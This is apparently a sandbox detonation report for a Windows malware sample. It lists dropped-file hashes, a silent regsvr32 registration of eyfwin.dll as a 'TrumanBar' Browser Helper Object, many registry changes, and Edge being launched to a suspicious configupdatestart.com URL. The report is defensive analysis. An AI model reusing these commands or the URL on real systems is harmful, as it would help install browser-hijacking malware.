| MD5 | 8974dafe9683042fb749ef1c95728ad8 |
| SHA1 | f342973a9fe0bb83d50f5256edeba0cd3fdb1c9c |
| SHA256 | 9f82fff5e9e551c5f06c23c1c1602538afd772d53b930bb8b57a704ae1021902 |
| SHA512 | 498b15100ad69a9fff85b80bf95cd68a6528916e69ee93d543a94d7cd42615e41a2e25d49054854e3b526ab819aa1b83f063b0da77c026a6d0d0b0c40cdd0700 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 876ab6fd75b174455e3d8ef78e3125cf |
| SHA1 | 4e25c5cbcb6a07889111644261c2097b7746e5ea |
| SHA256 | 785a61294b47e5f11561bd3399ed8fb457211cb1a7420a9e849773cc8519be17 |
| SHA512 | 10e13a795525cba53f0bef5b5a4cba65ea86d9661c77c7f8ce7f1d8ca4c8e7b7b976815bee29504d6bd9d5e4c7533aa19930c40630df6061d6f4d6841ce38d05 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | f129a7584bfca49ca9d542a5dec1d270 |
| SHA1 | 78ad5b9f686911cb83b41977f8b63b9f526ed3b1 |
| SHA256 | 7cb25e74916977abcb0c63ee1f2f53504b32373ec961464f0170f8f617652b3c |
| SHA512 | 8d36431ae0669ebc016a03adebc4e7bac7ff4f04f43db178c220074893bbbc3effc70ceea82734a58f8162a8bc050ea6baa3edb311a483c64779da7d29a615c3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6f2c1b0824ace765fe2baefece1fe768 |
| SHA1 | d4f283e8e7605390023c8e55ae557cc8e836bbff |
| SHA256 | 5b10db8df1e642bb38294a19da61e0feefc423ceddd3d80290c8578fdb0264ea |
| SHA512 | c82f9874bd50ddbb4b73473eb9f63417d024abd9e088554c4e5a0dc4e0a7f07c531fb43d681e7ad1b49d3309fed5ea1023f53f4a5ac4a332084a746ede1a7016 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | f438fcc6a9b10da54c4ced3d64658886 |
| SHA1 | 322b91aef090ab2728f8c06d7a647f5d28716be7 |
| SHA256 | 6a876a12207b0ea806aaaa94d57d9534d7ada7c1b27a94491307eccd539c5113 |
| SHA512 | 2ecd425176e24d645272be0952d6bb967a1d3e7f7875d5c06d15459a46f6928a8d92ca45d410ea520db12d697b7a2c1283034dc052b637e7aa5d6ae9969e138c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 69ec01c27e22686a553e3c94f5394c72 |
| SHA1 | 657383be1ec860a1b2fd59e68b4341d86277cbdf |
| SHA256 | d9f33e3e21f1d6da032fc772c3e3f7be2fd7b8bedc07b1debbe058ed7ba00497 |
| SHA512 | ed4acc5c8769da913b42bfa46975eca30b521aaafe07b8a2a494dfbbaf9db2438b4dd976a1f505c20fca2fb2756985f1f0ef885ff1b1886a5ffac8bd6608fa2a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3c0e4d35acbd2ef05abd322ecaa5eb15 |
| SHA1 | 3531d7f99f710c5126dfbdcbe6473d81bdaa9dce |
| SHA256 | 7a8d9df8f43910b2411700ef7db64cdb42b55b9c05ef663d6d73060b0d69ad56 |
| SHA512 | 64ac5bca35374326a77f00f6681905a77fdbe8e27578bf85b5d7d99a3a46c590226e502d46bdea96afd0095ff4107af7e2c8e389fe5733d9da1aa3d5f961885b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 367dcef0fe9c67c55f15fa21ad09f6f2 |
| SHA1 | c2731ce226fc9ee50f3cda95aaadbced646aaf2d |
| SHA256 | 7df5755d36adc33dc04f354458037a3649dbf82daf028bef17d2119bf2ea28da |
| SHA512 | 88b74696754baf1d141923fb88e97f1e48fb620c4b643fda598b1d60d9394880dc8bfe1e112d8e61956c1670d264342c5413fd712b2982dc469bd0bb32c04634 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e789ed7acaf0e3e374abad0065bdecef |
| SHA1 | cd69cfa42c3596ff1c587a9ab60c78840ca20d03 |
| SHA256 | fd2bf820088e8fd91d11b9a6971e1c606d3d5eb9ebb2d2fd8c1cae93ad395e78 |
| SHA512 | 951e218aa89060704b688f9c6f378640262f079c7774c9d11e5ce7b895f886970504aa29649a6f36587a574ae3f1bf4418b3e3acc5b04324e05fca8bd170b531 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2904ab405bdb5dfa9101408416dda90a |
| SHA1 | 7a135cc0b54d97253249d8305998d049a4d55d77 |
| SHA256 | 3a003280243da33f36001ddd202c7c35ae4ca75ac25aab5876a730be4590f8b5 |
| SHA512 | 7f8d9219d841d6d82c036435e89051425f652bb10b08c9ef9c75cdb24798cf9f6e28bdcc78d3004f8b96721b6958cd92e85a700dc9ec9058e1970ba487c5f686 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 60c27e4ea9787f7c6005e81c87cc6277 |
| SHA1 | b7fdda940467090d520d1cfdbe56cc704fa293a8 |
| SHA256 | 4a96c801e20ae70ea980f98ca2937637cc2f1175c6d7faa11b97f9de263c2e64 |
| SHA512 | 8ff28c92d8841a3ff87bfca5d2460d4a2c89c8f4bccd2911a645e5df3017e83e008df8b3502922e3356134b5e0ea784a5a87f17c935cbba0c3de0556ea39cce6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 409fc0a781e38a9e0b3a61bc34e95797 |
| SHA1 | 1e0dce5555658d89115017d0432818f9e10d8da6 |
| SHA256 | 6e185d3b59a23df9c9abab59059a240f84e5b0ee238a37977a19f92328877905 |
| SHA512 | 4fd486113829c7c9dbd2b7127373c0b7e9b869ba6e1115a9f44ed6f51d8b963bbb7cc1af930c0fb586c98d731e1c268a128e1a124e76f009c36e90d245c6dec2 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 16a0408b7e50caebd1e9b1be56136b38 |
| SHA1 | c566cb32813b099ad62d7ccbc58dfc450eee5e06 |
| SHA256 | 7564baaac54af7922e37bb659aa523e27dee836f144e30b76f684833999839ee |
| SHA512 | f7f6aba1adf2dabdc6278a70a6b9e25c9dfaac0e7bc2240b3cc6f0375ff6de79c59f29c373ac32ce011c831050a236195b8d209ef8d26786af79bc7cba8a0c34 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e8bcd45deff100a048e93cca379d40c4 |
| SHA1 | 27efe2a3eb4f4a66056868ca31fca79fc85c5646 |
| SHA256 | 125068523483e7fd9fc4bd3480220a276dea43d554e4fe91b5cc33e72d1de960 |
| SHA512 | 1161c13910981d65beba088733f2770c069609e278d3a52a279bfa2658d184c5d79158deaf77b127a3e2301bad8038dad0431a67142abce2bf65ec85be3aee7d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 29091c8dc162630c302427dca5182657 |
| SHA1 | 2d4cb12ac55365bf40b8fe5bc1a9db5ded2eb9a1 |
| SHA256 | b27344e52bd4279c35b74d743e949767e474c5f17aad84dd7b4544f95b141589 |
| SHA512 | 7cb720c94f3934c32fdc4eab4cd3f90b632a82e90d321706dd8d836202ab96371c6096bb08735552987a7ae686a6cd80025d9b14fda8c03a52f8d355f8a99bdf |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 60b047687e7c5636d62a2ea31ca18fba |
| SHA1 | b10e06c6a43efb87691bf320eedcbf69b4870f31 |
| SHA256 | f910bc4a3faadadc608a10b2cfb33ea5e67a301b1fc1b2c24574c6f2cc279c15 |
| SHA512 | 96638dc420a69ef1e5eab6f9c89d131c78eb4170319cf1d4f49dd68a52285e363f21316b406a111ab696830a79aa71d18ad37d55a689cceca5a97851ea511445 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 35bf63c2f10f6b4d70baa538f7f70c4c |
| SHA1 | e9dd9e51adf2469cf5221281722e608bcd8101fd |
| SHA256 | 41cf0e30302a32f0981358fe41a3d4dfdf9b962ca5542914766fc010c5de61b8 |
| SHA512 | 3673616152a7c407b7ad7e44ddbb5c0b01618e2ad055e3db375cb1d506ed1265e0836422abd30b3e49e216b263c4064ae91efd52a30be2c7cc34fcf7aa0bc491 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-02-04 19:42
Reported
2024-02-04 19:44
Platform
win10v2004-20231222-en
Max time kernel
146s
Max time network
145s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Installs/modifies Browser Helper Object
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{BDF6E57E-7330-40CB-8363-D82E9BFF223B} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\sf.ico | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
| File created | C:\Windows\SysWOW64\c.ico | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
| File created | C:\Windows\SysWOW64\m.ico | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
| File created | C:\Windows\SysWOW64\m3.ico | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
| File created | C:\Windows\SysWOW64\s.ico | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
| File created | C:\Windows\SysWOW64\eyfwin.dll | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
| File created | C:\Windows\SysWOW64\p.ico | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\ios.dat | C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe | N/A |
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\ProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\FLAGS | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\ = "Iffgd3c" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj.1\ = "TrumanBar" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\TypeLib\ = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\0\win32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj\ = "TrumanBar" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\FLAGS\ = "0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\Programmable | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\InprocServer32\ = "C:\\Windows\\SysWow64\\eyfwin.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\ProgID\ = "Ho4ydomoj.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\VersionIndependentProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\VersionIndependentProgID\ = "Ho4ydomoj" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\ = "Iffgd3c" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\ = "TrumanBar" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\TypeLib\ = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\TypeLib\ = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\ = "ddf457 Library" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj.1\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj\CurVer\ = "Ho4ydomoj.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\HELPDIR | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\ = "_Iffgd3cEvents" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\TypeLib\ = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj\CurVer | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\0\win32\ = "C:\\Windows\\SysWow64\\eyfwin.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj\CLSID\ = "{BDF6E57E-7330-40CB-8363-D82E9BFF223B}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDF6E57E-7330-40CB-8363-D82E9BFF223B}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\TypeLib\ = "{A8954909-1F0F-41A5-A7FA-3B376D69E226}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\ = "_Iffgd3cEvents" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj.1\CLSID\ = "{BDF6E57E-7330-40CB-8363-D82E9BFF223B}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\TypeLib\Version = "1.0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{685EDF73-6BF2-45EA-A1C1-1C4C0C044307}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{A8954909-1F0F-41A5-A7FA-3B376D69E226}\1.0\HELPDIR\ = "C:\\Windows\\SysWow64\\" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Ho4ydomoj.1 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9EFB101A-EA9A-4065-B8A4-8963FC57C446}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe
"C:\Users\Admin\AppData\Local\Temp\8ffcef8076920d374af454c1f3b406f9.exe"
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" /s C:\Windows\system32\eyfwin.dll
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://configupdatestart.com/bind2.php?id=3913842
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcf99546f8,0x7ffcf9954708,0x7ffcf9954718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,1722660150891342615,9099823534265754620,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
